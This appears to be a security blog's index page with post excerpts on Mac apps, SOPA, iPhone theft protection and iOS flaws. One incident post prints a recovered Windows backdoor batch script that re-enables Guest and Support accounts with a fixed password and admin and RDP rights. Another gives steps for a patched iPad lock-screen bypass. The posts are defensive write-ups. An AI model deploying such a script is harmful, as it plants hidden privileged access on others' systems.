My Definitive List of Must-have Free Mac Applications and Best Paid-for Counterparts
These are the apps that I will install first on pretty much any new Mac that I get. I’m a huge fan of free and open source software, and no other platform has free software of the same quality and caliber as Mac OS X. Most of these are Mac-only apps (a couple are cross-platform). I’m listing free applications wherever possible, but if there is a paid-for app that I consider best-of-breed, I mention those too. Hopefully this list will help all of the techie switchers get the apps they need quickly. This list is a work-in-progress, so I’ll be adding to this it over time.
If you’re only interested in my recommended security apps, they’re at the bottom! Feel free to post in the comments if you have any you think are worth mentioning.
Last updated: 27/10/2012
Stop SOPA, Stop PIPA, Stop Censorship
Update: Now that SOPA has been put on the back burner, the next thing to protest is the Anti-Counterfeiting Trade Agreement (ACTA), an international treaty which could have massive repercussions on the freedom of the internet.
Update 2 (5 July 2012): ACTA rejected by EU :)
Anyone who follows Security Generation will know that I’m a big advocate of civil liberties and freedom in general. The internet is currently a multicultural and multimedia hub of information, ideas, creativity and innovation, and there is a risk this could be irrevocably changed. Granted there is also a lot of crap on the internet, but freedom works both ways. Whilst the Stop Online Piracy Act (SOPA) and Protect IP Act (PIPA) intend to reduce piracy on the net, in reality they would hand vast amounts of power over to industry copyright holders, who would then have the ability to have sites blocked and content taken down, inhibit free speech and bring . For more information about all of this, check out this good summary article.
Due to the threat that these acts would pose to the open internet, many large internet companies have stated their opposition including Google, Yahoo!, Twitter, eBay, and Wikimedia, as well as civil liberties groups such as the ACLU and the EFF. On January 18, these and countless other blogs and sites, including Security Generation, will be protesting this legislation by blacking out (read: censor) parts of their sites and educating users about the danger of american censorship.
If you have a blog or website, you’re encouraged to add your voice to the cause. CloudFlare users will be able to easily participate just by enabling the new Stop Censorship app, which will black out large chunks of text on your site, and inform your users about the dangers presented by this type of legislation. WordPress users without CloudFlare can also join in by installing one of the many Stop SOPA/PIPA plugins.
This is my favorite anti-SOPA song so far:
Frequently Asked Questions About Find My iPhone (and iPad)
I’ve been getting a lot of hits for my article on Protecting and Recovering Your iPhone and iPad from Loss and Theft, and the search queries I’m seeing in my logs, together with the visitor comments, have raised a number of recurring questions. I’ve decided to publish this one-stop-shop of answers for all of the different queries that I see people searching for when they arrive. Although my article addresses a number of these, I wanted to put them all in one post for easy reference. I’ll update this post as new questions crop up. Here goes, in no particular order:
New! iPhone Lockscreen Generator
When people ask me about the different ways they can protect their iPhone in case it gets lost or stolen, I usually point them in the direction of my article on Protecting and Recovering Your iPhone and iPad from Loss and Theft. I just updated that article to include a tip about creating a custom lockscreen image for your iPhone that may help someone return it to you in the event it gets lost.
A tip is all good and well, but creating such a customised image may be beyond the technical abilities of your average iPhone user, so I hacked together the brand new iPhone Lockscreen Generator!
http://lockscreengenerator.com
This free online tool allows anyone to create a customised lockscreen (currently with one of four background images), in less than a minute. Just enter your contact details (first name, alternate contact number), and maybe a short note for whomever finds your iPhone (reward maybe?), click generate, then tap/click on the image to download it. You can do this on your computer, and email yourself the image, or do it directly on your iPhone.
Once downloaded to your iPhone, you can set the image as your lockscreen wallpaper by going into the Photos app, tapping your image, then tap the ‘send to’ icon in the bottom left-hand corner of the screen, select Use as wallpaper > Set > Set Lock Screen.
Don’t forget to share this with your friends! You can even use one of the share links below ;) If you have any feedback or tips, let me know.
Charlie Miller Discovers iOS Code-Signing Bypass Vulnerability
Security researcher Charlie Miller (@0xcharlie) has discovered a significant flaw in iOS which may allow a malicious app on the App Store to download and execute arbitrary unsigned code. What this means for iPhone, iPad and iPod Touch users is that installing a malicious app may allow an attacker to obtain shell access to your device, and download contacts or images.
Apple reviews every app submitted to the App Store, which has meant that iOS users have not had to worry about outright malware. Since this vulnerability allows the apps to fetch code remotely, they can perform actions not reviewed by the App Store staff. Charlie had submitted a proof-of-concept app that was approved (see video below), but has since been removed by Apple.
The reason this vulnerability works is based around some changes Apple made in iOS 4.3 last year, which allowed Mobile Safari to run javascript at a more privileged level on the devices. This change required Apple to make an exception for Safari to execute unsigned code in a particular area of memory. Charlie Miller’s bug is allegedly a very unique case that allows any app to take advantage of this, and hence run their own unsigned code.
Charlie will be presenting the vulnerability in detail at the SysCan conference in Taiwan next week. Apple has already released a developer beta of iOS 5.0.1 which patches the recent iPad Smart Cover lock screen bypass, but I would not be at all surprised if they release another beta which includes a fix for this bug. Until then, be careful to only install apps from developers you trust.
[Update] Apple has kicked Charlie out of the Developer program. At first I felt that this was an extremely bad reaction on Apple’s part. That said, Apple is probably most upset that Charlie’s proof-of-concept app could have been installed by legitimate users. Regardless of Charlie’s intentions, this could constitute malware, and he should have removed the app as soon as he saw the flaw existed. The posting of his video above probably didn’t help matters either.
Malicious Backdoor Batch Script Re-Enables Privileged Guest and Support Accounts on Windows Servers
I recently came across a Windows 2000 server that was found to have been compromised. During the investigation, both the Guest and Support_388945a0 accounts were found to had been placed in the Administrators and Remote Desktop Users groups (as the server was internet facing). Things got interesting however, when we removed these accounts from those groups and disabled them both. After logging back in a short while later, both Guest and Support accounts had been re-enabled and put back into the Admins and RDP groups.
When going to check the Windows hosts file to make sure there weren’t any modifications made to it, the following suspicious files were found in %systemroot%\system32\drivers\etc\
1.exe
2.exe
gm.dls
gmreadme
logoff.exe
netstat.exe
query.exe
t.msc
ts.exe
After some analysis, none of these files were found to be inherently malicious, but are instead used by a malicious batch script to enable the Guest and Support accounts with a specific password, and add them to the Admins and RDP group. The 1.exe file, for example, is just a executable with account-management capabilities.
In C:\WINDOWS\Application Compatibility Scripts\Install\Template there was a batch script called “.bat” with the following contents:
@cd %systemroot%\system32\drivers\etc\
@1 localgroup “Remote Desktop Users” SUPPORT_388945a0 /add
@1 localgroup “Remote Desktop Users” guest /add
@1 user guest QQqqaa123321
@1 user guest QQqqaa123321 /add
@1 localgroup administrators guest /add
@1 user guest /active:yes
@1 user SUPPORT_388945a0 QQqqaa123321
@1 user SUPPORT_388945a0 QQqqaa123321 /add
@1 localgroup administrators SUPPORT_388945a0 /add
@1 user SUPPORT_388945a0 /active:yes
At this point it’s fairly evident what’s going on, this bat script is being run periodically, and runs 1.exe to ensure that both the Guest and Support_338945a0 accounts are present, and in the Administrators and Remote Desktop Users groups. It also sets the password to both of those accounts to ‘QQqqaa123321′. If you find these files on your system, consider that server compromised. Remove the files and disable those accounts in the first instance, but a full rebuild is highly recommended to rule out the possibility of other backdoors or rootkits.
These types of batch scripts are not uncommon for backdoor trojans. However, I couldn’t find any references to this particular backdoor, so thought I would post about this in case anyone else searches for information about it. Note that at the time of writing, this batch script is not picked up by any anti-virus software.
iPad Lock Screen Bypass Vulnerability using Smart Cover [Patched]
Marc Gurman at 9to5Mac has discovered a vulnerability on the iPad that allows for a limited bypass of the device’s lockscreen. Anyone with an iPad Smart Cover (or fridge magnet) can gain access to the previously-open app (or the home screen if no app was open).
By holding the power button to bring up the ‘Power Off’ screen, closing the smart cover, re-opening it (or just sliding a fridge magnet along the right-hand side of the device), and clicking cancel, the attacker will be dropped into the screen that was open before the iPad was locked. If the attacker gets dropped into the home screen, then they’ll be able to see the installed apps, but won’t be able to open anything. If Safari or Mail (or any other app) was the open when the device was locked, then the attacker would have access to that app.
Unlike Siri being available from the lock screen, which is not a security flaw (an unintended behaviour), this one actually is; and although an attacker does not get full control of the iPad, the severity depends on whether a sensitive app was being used before the device was locked.
Luckily it is possible to protect yourself against this bug in the interim by disabling Smart Covers in Settings > General > iPad Cover Lock/Unlock > Off. Expect Apple to patch this in iOS 5.0.1. Check out 9to5′s video below for a demonstration:
[Update] Apple did indeed patch this bug in iOS 5.0.1. Those of you who disabled your Smart Covers for security purposes can now re-enable them!
A Quick Introduction to Lockpicking and Useful Resources for Beginners
I’ve been into lockpicking for a few years now, and I’m surprised I’ve never posted more about it (maybe I will). Suffice it to say that lockpicking is great fun, you learn a lot, and one day it may come in handy (legally of course). One thing I’ve noticed whenever I talk about lockpicking, is that most people -including techies – have very little clue about how locks themselves actually work. It’s no surprise then that lockpicking feels like a bit of mystery to many. In reality the majority of locks are very simple devices, and many can be picked or bypassed using fairly simple tools.
I had the pleasure of taking part in the Defcon 19 Gringo Warrior contest where participants must bypass a series of locks to ‘escape’. It’s scored based on time and difficult of locks picked. I scored about above average. In this post I’m going to give my own shotgun intro to lockpicking, and provide some videos and links to other useful references where you can go find more detail.
Securing Siri on a Locked iPhone 4S
Although I haven’t had the chance to play with her myself (does that sound wrong?), Siri seems like an awesome addition to the iPhone. It’s worth pointing out, however, that it is still possible to use Siri when the iPhone is locked – presumably for convenient ease-of-use. Unfortunately this means that anyone with physical access to your phone can access information including contacts, calendar items, SMS/iMessages, and also make calls and send emails or messages from you.
[Update] There have been a whole bunch of people crying about how this is a major security flaw. Just to dispel some of the myth… this is not a security flaw, it’s a design decision that Apple made based on usability. Yes, it’s a default setting that may introduce some vulnerabilities, but then again there are still lots of people who run around without passcodes. To be honest I’m usually the first to secure the hell out of everything, but in this case I feel they made the right decision for two reasons. First, Siri is obviously less useful as a hands-free assistant if you need to unlock your phone every time; and secondly making it easier to use will help drive the adoption of Siri.
Luckily Apple thought of this on at least two levels. First, if you ask Siri to unlock your iPhone she’ll respectfully tell you that she “can’t unlock your phone for you”. Secondly – and this is the important one – it is possible to disable the use of Siri when the iPhone is locked. The option now lives in Settings > General > Passcode Lock, where you can set Siri to Off.
Needless to say (contrary to the screenshot), I recommend setting ‘Require Passcode’ to Immediately, turn Simple Passcode off so you can set a 5-or-more-digit PIN, set ‘Siri’ to off to prevent access when your iPhone is locked, and turn on Erase Data after 10 failed passcode attempts.
Siri is great, but let’s not make it easy for someone to social-engineer her into betraying you. See my other post for more details on protecting your iPhone from loss and theft.
In other news… you can tell Siri to use a specific nickname when talking to you. It’s important to note, however, that the nickname will be put into your VCard. So be careful if you tell her to call you her pimp, and then send someone your contact details ;)
Apple Releases Slew of Security Updates (OSX, Safari, iTunes, iOS 5, aTV)
I wasn’t going to post about last week’s fairly significant iTunes update, but then Apple went and patched a whole bunch of vulnerabilities across the board. Some of these are fairly significant so I thought I would provide a short breakdown of the changes. Either way, you should definitely be patching all of your Apple devices and software tonight.
Hit the jump for a summary of the key vulnerabilities patched in Apple’s security updates.
Loading ...
